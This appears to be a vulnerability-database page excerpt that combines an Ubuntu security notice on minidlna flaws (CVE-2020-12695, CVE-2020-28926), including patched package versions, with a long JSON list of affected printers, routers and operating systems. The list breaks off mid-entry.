iQIVAwUBYKPxUtzjgjWX9erEAQhZhw//Ypgq/0qu2SS/hw8alPmqQ6CG5C/xOqF6 uJL5HVQ+KPu8Go+UifB3xP3Izm9GYh9aNpcR3bPTx3NsfJdQyzPNSo8O2bC3mUBl Lw6Bh++uhaNx3ADaKfceEG5teXbkwAadSft0W7j9jiY70qjVWfvqKjzBS3UyOL/P ++SdPU96uOX9nAkeT3wqirWjXDjUMJLao6AvRtXOXJ2MNwJp436S/KemSkMq2Mg7 izSYf7Biojg5SMNM4rsFBSnIqmehomfsVFetttHImCfTYteTfddti42gMelZyG8k MK4CJw1DeR1e30teWaHnoVa9xAPJMKx56RG3/Wr+6Y5nK0rFZoZuMiJn2b7KodcH fYbfxkwrQQ/R9bYZn03YgCz4zl/hetsoITKFHcsPNB9qtdRdtQhYzeOG+AyiawWh YtF3vlomMlaxuOZV9zTJUIWZX/ev6wWx8VsXuHKMBwtBxO7l3M0Hd+BOxRPVE/mu m+DBcBQp7fvaw55tCAQtHS3CKvgGYijDvOFHBOkQw5Zh9ttdfLlKo4H4NU0W4dLN HJWuKGelB2vGc0eoqZ7yCi2xuWBYxjDIoYGzlwPJSnrrguqeLfOKVykja8AYpIET V/XCUk/geIiEbSRwAR8EPXDpTLLicGrR6pbekpMfALm/GGc5I4RyA9AbVNJ9fF+a 7bb2GlcOcWo=2GSN -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================= Ubuntu Security Notice USN-4722-1 February 04, 2021
minidlna vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
Summary:
ReadyMedia (MiniDLNA) could be made to crash if it received specially crafted input. (CVE-2020-12695)
It was discovered that ReadyMedia (MiniDLNA) allowed remote code execution. A remote attacker could send a malicious UPnP HTTP request to the service using HTTP chunked encoding and cause a denial of service. (CVE-2020-28926)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.10: minidlna 1.2.1+dfsg-2ubuntu0.1
Ubuntu 20.04 LTS: minidlna 1.2.1+dfsg-1ubuntu0.20.04.1
Ubuntu 18.04 LTS: minidlna 1.2.1+dfsg-1ubuntu0.18.04.1
Ubuntu 16.04 LTS: minidlna 1.1.5+dfsg-2ubuntu0.1
In general, a standard system update will make all the necessary changes
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "envy 4524 k9t01a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "vmg8324-b10a",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": null
},
{
"_id": null,
"model": "5030 m2u92b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5542 k7c88a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "adsl",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "envy 6020 5se16b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 114 cq812a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4654 f1j07b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5531",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4505 a9t86a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 111 cq810a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4500 a9t80b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4502 a9t85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5547 j6u64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5664 f8b08a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6200 y0k13d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 5575 g0v48b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4503 e6g71b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7800 k7r96a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4502 a9t87b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5530",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5546 k7c90a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5642 b9s64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5000 m2u85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-8600",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4675 f1h97b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5536",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 7645 e4w44a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6234 k7s21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4513 k9h51a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4538 f0v66b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 6020 5se17a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 114 cq811b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5545 g0v50a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "b1165nfw",
"scope": "eq",
"trust": 1.0,
"vendor": "dell",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4515",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "wap131",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "envy 4520 f0v63a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ep-101",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "xp-702",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "xp-330",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "xp-970",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "officejet 4652 k9v84b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7155 z3m52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4522 f0v67a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4520 e6g67b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4500 a9t80a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4526 k9t05b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-320",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "officejet 4650 f1h96b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7100 z3m52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ew-m970a3t",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy 100 cn517a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 110 cq809b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 3548 a9t81b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4658 v6d30b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7800 k7s10d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4511 k9h50a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4508 e6g72b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-4105",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy photo 6252 k7g22a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "m571t",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 5575 g0v48c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4654 f1j06b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5000 z4a54a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy pro 6455 5se45a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "wap351",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "envy 5541 k7g89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4509 d3p94b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7164 k7g99a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-2101",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy 4504 c8d04a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4535 f0v64c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5535",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4512 k9h49a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4535 f0v64b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7100 k7g99a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "hostapd",
"scope": "lt",
"trust": 1.0,
"vendor": "w1 fi",
"version": "2.0.0"
},
{
"_id": null,
"model": "wap150",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "officejet 4655 k9v82b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5640 b9s58a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 6020 6wd35a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4528 k9t08b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 110 cq809a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "zxv10 w300",
"scope": "eq",
"trust": 1.0,
"vendor": "zte",
"version": null
},
{
"_id": null,
"model": "envy photo 6222 y0k14d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4675 f1h97c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5000 z4a74a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7100 3xd89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4535 f0v64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5000 m2u91a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "*"
},
{
"_id": null,
"model": "deskjet ink advantage 4675 f1h97a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7800 k7s00a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-630",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "xp-620",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy pro 6420 6wd16a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4650 e6g87a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "unifi controller",
"scope": "eq",
"trust": 1.0,
"vendor": "ui",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4676 f1h98a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4500 a9t89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5540 g0v47a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 3456 a9t84c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "5660 f8b04a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5643 b9s63a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "selphy cp1200",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": null
},
{
"_id": null,
"model": "envy photo 7120 z3m41d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4516 k9h52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4655 f1j00a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 6540 b9s59a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5532",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 7644 e4w46a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 110 cq812c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 3545 a9t81a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-4100",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy 100 cn517c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "5020 z4a69a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7800 y0g52b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 120 cz022a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7822 y0g42d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "dvg-n5412sp",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"_id": null,
"model": "envy 5540 g0v51a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4523 j6u60b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7800 y0g42d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4507 e6g70b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 100 cn519b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5544 k7c89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4521 k9t10b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 120 cz022b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy pro 6420 5se46a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy pro 6420 6wd14a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4652 f1j02a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7100 k7g93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4518",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4650 f1h96a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5646 f8b05a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5665 f8b06a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 7640",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5543 n9u88a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5544 k7c93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "hg255s",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": null
},
{
"_id": null,
"model": "envy pro 6420 5se45b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "xp-2105",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy 110 cq809d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6200 k7g26b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5539",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5644 b9s65a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 100 cn519a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4501 c8d05a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4509 d3p94a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4655 k9v79a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-100",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy 5540 g0v53a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "20.04"
},
{
"_id": null,
"model": "envy 5640 b9s56a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4656 k9v81b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "envy photo 6200 k7s21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6220 k7g20d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-340",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "hg532e",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": null
},
{
"_id": null,
"model": "envy 4520 f0v63b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "5030 z4a70a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4524 f0v71b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 110 cq809c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 6020 7cz37a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4536 f0v65a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6230 k7g25b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7822 y0g43d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 100 cn517b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 120 cz022c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4500 d3p93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-960",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "envy 4520 f0v69a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4525 k9t09b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "zonedirector 1200",
"scope": "eq",
"trust": 1.0,
"vendor": "ruckussecurity",
"version": null
},
{
"_id": null,
"model": "envy photo 6232 k7g26b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5000 m2u91a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "5034 z4a74a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "envy 4520 e6g67a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy pro 6452 5se47a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "wr8165n",
"scope": "eq",
"trust": 1.0,
"vendor": "nec",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 3545 a9t83b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 4678 f1h99b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 3546 a9t82a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4527 j6u61b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5548 k7g87a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6220 k7g21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-8500",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "xp-440",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "windows 10",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "envy 5000 m2u94b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4504 a9t88b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6200 k7g18a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7100 z3m37a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5020 m2u91b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 4524 f0v72b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "officejet 4657 v6d29b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xp-241",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"_id": null,
"model": "deskjet ink advantage 3545 a9t81c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "xbox one",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19041.2494"
},
{
"_id": null,
"model": "envy 5534",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5000 m2u85b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 100 cn518a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "rt-n11",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"_id": null,
"model": "amg1202-t10b",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": null
},
{
"_id": null,
"model": "officejet 4652 f1j05b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "wnhde111",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"_id": null,
"model": "envy 114 cq811a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 7830 y0g50b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5540 g0v52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 6055 5se16a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 5540 f2e72a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6222 y0k13d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy photo 6200 y0k15a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "archer c50",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"_id": null,
"model": "envy 5540 k7c85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "envy 6052 5se18a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "rt-n11",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"_id": null,
"model": "adsl",
"scope": null,
"trust": 0.8,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "dvg-n5412sp",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "unifi controller",
"scope": null,
"trust": 0.8,
